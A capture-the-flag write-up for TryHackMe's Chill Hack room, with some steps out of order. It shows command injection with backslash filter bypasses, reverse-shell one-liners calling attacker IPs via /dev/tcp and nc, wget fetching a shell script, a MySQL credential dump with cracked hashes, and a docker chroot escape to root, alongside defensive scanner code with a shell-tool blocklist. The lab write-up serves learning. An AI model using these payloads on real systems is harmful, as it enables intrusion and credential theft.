Challenges: Chill Hack (TryHackMe)


The Chill Hack machine on TryHackMe is an easy-level CTF focused on web exploitation, privilege escalation, and creative command injection techniques. The challenge starts with a seemingly harmless website, but deeper inspection reveals vulnerable PHP code that allows command execution. From there, privilege escalation is achieved by abusing a misconfigured script, leading to root access. This room is good practice for RCE exploitation, bypassing command filters, and Linux privilege escalation methods.
Investigate!
Chill the Hack out of the Machine.
Easy level CTF. Capture the flags and have fun!
Answer the questions below
- User Flag
We started by scanning the target machine with:
nmap -sV IP_Address
and enumerating web directories:
gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt
One interesting path discovered was /secret/. Visiting it revealed an unusual behavior: adding $(echo ls) in the URL triggered an execution response.
Checking the site: http://IP_Address/secret/
$(echo ls)
$(echo cat\ index.php)
This, among other commands, displays ‘Are you a hacker?’ in red.
Viewing the source code showed a suspicious comment: <!--?php echo shell_exec($cmd);?-->. I tried to research what this would mean on ChatGPT:
<!--?php echo shell_exec($cmd);?-->
🔸 This is a commented-out PHP line, but some servers misinterpret or ignore malformed comments, so shell_exec($cmd) may still get executed, especially if this is inside an eval or obfuscated logic.
🔸 The command is probably being passed from a query string, like:
http://<ip>:<port>/index.php?cmd=ls
This indicated the page might be executing commands from a query string. Testing with:
/index.php?cmd=ls
/index.php?cmd=cat%20index.php
/index.php?cmd=whoami
🧠 Why You're Seeing “Are you a hacker?”
Because this line:
<h1 style="color:red;">Are you a hacker?</h1>
...is just static content inside the index.php. It's reprinted every time the page reloads, which makes sense after triggering your new shell.
✅ Confirm Functionality
Try this:
/index.php?cmd=ls%20-la
/index.php?cmd=cat%20/etc/passwd
If it works, then:
💥 You have Remote Code Execution (RCE) via shell_exec() from a GET parameter!
ftp IP_Address
get note.txt
cat note.txt
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
uname -a
Linux ip-10-10-167-107 5.15.0-138-generic #148~20.04.1-Ubuntu SMP Fri Mar 28 14:32:35 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
We got a shell as www-data.
Checking sudo -l revealed a script executable by another user (apaar):
sudo -l
Matching Defaults entries for www-data on ip-10-10-167-107:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-167-107:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
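A defender's counterpart to the sudo -l check above, added here and not part of the original write-up: a small Python audit that parses that output (copied as constructed sample data, with one benign rule added for contrast) and flags the properties that made the helpline rule a privilege-escalation path.

```python
import re
from pathlib import PurePosixPath

# Constructed copy of the `sudo -l` output quoted in the write-up; the second
# rule is an added benign example so the audit has something to pass.
SUDO_L_OUTPUT = """\
Matching Defaults entries for www-data on ip-10-10-167-107:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User www-data may run the following commands on ip-10-10-167-107:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
    (root) /usr/bin/systemctl restart apache2
"""

# Shape of a rule line: "(runas : group) TAG: TAG: command, command"
_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(output: str) -> list[dict]:
    """One dict per rule line following the 'may run the following' header."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = _RULE.match(line) if in_rules else None
        if m:
            rules.append({
                "runas": m["runas"].split(":")[0].strip(),
                "tags": {t for t in m["tags"].replace(" ", "").split(":") if t},
                "commands": [c.strip() for c in m["cmds"].split(",")],
            })
    return rules

def audit_rule(rule: dict) -> list[str]:
    """Flag the properties that turned this room's rule into a user switch."""
    findings = []
    for cmd in rule["commands"]:
        path = PurePosixPath(cmd.split()[0])
        if "NOPASSWD" in rule["tags"]:
            findings.append(f"{path}: runs as {rule['runas']} without a password")
        if path.parts[:2] == ("/", "home"):
            findings.append(f"{path}: lives under /home, so its owner can rewrite it")
        if path.name.startswith("."):
            findings.append(f"{path}: hidden file, easy to miss in a review")
        if path.suffix == ".sh":
            findings.append(f"{path}: shell script; review how it uses the input it reads")
    return findings

if __name__ == "__main__":
    for rule in parse_sudo_l(SUDO_L_OUTPUT):
        print(rule["commands"], audit_rule(rule) or "ok")
```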
$(echo cat\ /home/apaar/.helpline.sh)
#!/bin/bash
echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo
read -p "Enter the person whom you want to talk with: " person
read -p "Hello user! I am $person, Please enter your message: " msg
$msg 2>/dev/null
echo "Thank you for your precious time!"
$(echo sudo\ -u apaar /home/apaar/.helpline.sh)
sudo -u apaar /home/apaar/.helpline.sh
echo -e "someone\\nid" | sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time! uid=1001(apaar) gid=1001(apaar) groups=1001(apaar) Thank you for your precious time!
echo -e "bash -i >& /dev/tcp/..."
Privilege Escalation
While exploring, we found a note mentioning command filtering. Some words like rm or cat were blocked, but escaping them (e.g., r\m or c\at) bypassed the filter. This allowed us to upload a reverse shell:
echo -e "anyone\\n/bin/sh" | sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time! Thank you for your precious time!
echo '/bin/bash -i >& /dev/tcp/10.10.196.78/4444 0>&1' > shell.sh
python3 -m http.server 80
and on the target:
echo -e "anyone\\nwget http://10.10.65.21/shell.sh -O /tmp/shell.sh" | sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time! Thank you for your precious time!
echo -e "anyone\\nbash /tmp/shell.sh" | sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time! Thank you for your precious time!
Start a Netcat listener on port 4444:
nc -lvnp 4444
On the site, use the command below once you've opened netcat on port 4444. Replace attack_machine_IP and PORT:
r\m /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attack_machine_IP> <PORT> >/tmp/f
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc attack_machine_IP PORT > /tmp/f
Obfuscating commands like r\m and c\at was genius — it evaded the WAF (Web Application Firewall) or whatever filter was flagging classic patterns and keywords.
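The note's filter failed because it compared the raw string against keywords while the shell later removed the backslashes, quotes and $(echo ...) wrappers. The following added example (mine, not the room's code) normalizes a cmd= value the way the shell would before matching it, then runs that check over constructed access-log lines modelled on the requests in this write-up, so r\m, c\at and the $(echo ...) trick all surface as the commands they really are.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Names the note said the target filtered, plus a few a defender would add.
BLOCKED = {"rm", "cat", "nc", "sh", "bash", "wget", "curl", "mkfifo", "python3"}
_ECHO_SUBST = re.compile(r"\$\(\s*echo\s+(.*?)\s*\)")

def normalize(cmd: str) -> str:
    # Undo what the shell undoes before running the command, so the filter sees
    # the text the shell will: %5C -> \ (double encoding), $(echo ls) -> ls,
    # r\m -> rm, c"a"t -> cat.
    cmd = unquote(cmd)
    for _ in range(3):                      # a few nesting levels of $(echo ...)
        cmd = _ECHO_SUBST.sub(r"\1", cmd)
    cmd = re.sub(r"\\(.)", r"\1", cmd)      # drop backslash escapes
    return re.sub(r"""["']""", "", cmd)     # drop quote characters

def command_names(cmd: str) -> list[str]:
    """First word of each ;/|/& segment or substitution, without its path."""
    names = []
    for segment in re.split(r"[;&|`]+|\$\(|\)", cmd):
        words = segment.split()
        if words:
            names.append(words[0].rsplit("/", 1)[-1])
    return names

def blocked_commands(raw_cmd: str) -> set[str]:
    return {n for n in command_names(normalize(raw_cmd)) if n in BLOCKED}

# Constructed Apache-style access-log lines modelled on the write-up's requests.
ACCESS_LOG = [
    '10.10.65.21 - - [28/Mar/2025:14:40:01 +0000] "GET /secret/index.php?cmd=ls HTTP/1.1" 200 512',
    '10.10.65.21 - - [28/Mar/2025:14:40:09 +0000] "GET /secret/index.php?cmd=%24(echo%20c%5Cat%5C%20index.php) HTTP/1.1" 200 1044',
    '10.10.65.21 - - [28/Mar/2025:14:41:30 +0000] "GET /secret/index.php?cmd=r%5Cm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.65.21%204444%20%3E/tmp/f HTTP/1.1" 200 0',
    '10.10.65.21 - - [28/Mar/2025:14:42:00 +0000] "GET /secret/index.php?cmd=whoami HTTP/1.1" 200 498',
]

def scan_access_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """(decoded cmd value, sorted blocked names) for each request that would
    run a blocked command once the shell has finished un-quoting it."""
    hits = []
    for line in lines:
        m = re.search(r'"GET (\S+) HTTP', line)
        if not m:
            continue
        for cmd in parse_qs(urlparse(m.group(1)).query).get("cmd", []):
            bad = blocked_commands(cmd)
            if bad:
                hits.append((cmd, sorted(bad)))
    return hits
```

Running scan_access_log(ACCESS_LOG) flags the second and third requests; the plain ls and whoami requests pass, which is the behaviour the author observed on the target.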
This script executed user input unsafely, enabling us to inject commands and upgrade to the apaar user:
I had to try passing the right message over and over; the next attempt worked well and eventually the flag was revealed:
sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
Enter the person whom you want to talk with: /bin/sh
Hello user! I am /bin/sh, Please enter your message: /bin/sh
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
python3 -c 'import pty;pty.spawn("/bin/bash")'
apaar@ip-10-10-141-164:~$ pwd
/home/apaar
apaar@ip-10-10-141-164:~$ cat local.txt
Root Flag
Root Access
ssh-keygen -f apaar
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in apaar
Your public key has been saved in apaar.pub
The key fingerprint is:
SHA256:qMval/CvZzYne1OvtaoSOE8ZU09mIe0IK3iK4NKo7Cg apaar@ip-10-10-141-164
apaar@ip-10-10-141-164:~$ ls
apaar  apaar.pub  local.txt
apaar@ip-10-10-141-164:~$ cat apaar.pub
In the next step, I had to use linpeas.sh:
find / -type f -name linpeas.sh 2>/dev/null
/opt/PEAS/linPEAS/linpeas.sh
$PASSWORDTRY
<html>
<body>
<?php
if(isset($_POST['submit']))
{
    $username = $_POST['username'];
    $password = $_POST['password'];
    ob_start();
    session_start();
    try
    {
        $con = new PDO("mysql:dbname=webportal;host=localhost","root","!@m+her00+@db");
        $con->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_WARNING);
    }
    catch(PDOException $e)
    {
        exit("Connection failed ". $e->getMessage());
    }
    require_once("account.php");
    $account = new Account($con);
    $success = $account->login($username,$password);
    if($success)
    {
        header("Location: hacker.php");
    }
}
?>
<link rel="stylesheet" type="text/css" href="style.css">
<div class="signInContainer">
  <div class="column">
    <div class="header">
      <h2 style="color:blue;">Customer Portal</h2>
      <h3 style="color:green;">Log In<h3>
    </div>
    <form method="POST">
      <?php echo $success?>
      <input type="text" name="username" id="username" placeholder="Username" required>
      <input type="password" name="password" id="password" placeholder="Password" required>
      <input type="submit" name="submit" value="Submit">
    </form>
  </div>
</div>
</body>
</html>
With user-level access, we searched for credentials and found a database password inside a PHP file:
!@m+her00+@db
mysql -h localhost -uroot -p
Enter password:
mysql>
mysql> show databases;
mysql> USE webportal;
mysql> SELECT * FROM users;
+----+-----------+----------+-----------+----------------------------------+
| id | firstname | lastname | username  | password                         |
+----+-----------+----------+-----------+----------------------------------+
|  1 | Anurodh   | Acharya  | Aurick    | 7e53614ced3640d5de23f111806cc4fd |
|  2 | Apaar     | Dahal    | cullapaar | 686216240e5af30df0501e53c789a649 |
+----+-----------+----------+-----------+----------------------------------+
2 rows in set (0.00 sec)
The hashes resolve to masterpassword (Aurick) and dontaskdonttell (cullapaar).
Use a Rainbow table like Crackstation to get the actual password
cd /var/www/html/secret
id
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# whoami
# ls -la
Using it to log in to MySQL exposed usernames and hashes, which, when cracked, provided additional credentials. Eventually, we identified an SSH key reuse issue, generated a new key pair, and escalated to root. The final flag was retrieved from /root/proof.txt.
cat proof.txt
Among all challenges I’ve done this was one of the most challenging ones. These resources came in handy while researching alongside ChatGPT:
https://medium.com/@saul_x0/chill-hack-write-up-tryhackme-11c72e126197
https://medium.com/@Inching-Towards-Intelligence/thm-chill-hack-19-100-44a59fbedc25
This challenge demonstrates how small vulnerabilities like improperly handled command input (shell_exec($cmd)) can lead to full system compromise when combined with insecure scripts and weak credentials. It reinforces the importance of validating and sanitizing user inputs, implementing strict least-privilege principles, and restricting sensitive files and scripts. For learners, it's an excellent example of chaining web exploitation with privilege escalation to achieve complete compromise.
Written by

Jebitok